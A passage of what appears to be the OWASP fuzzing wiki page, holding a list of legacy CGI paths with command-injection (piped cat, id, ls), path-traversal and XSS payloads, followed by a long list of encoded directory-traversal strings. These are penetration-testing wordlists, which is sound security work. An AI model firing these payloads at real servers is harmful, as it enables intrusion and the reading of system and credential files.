shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
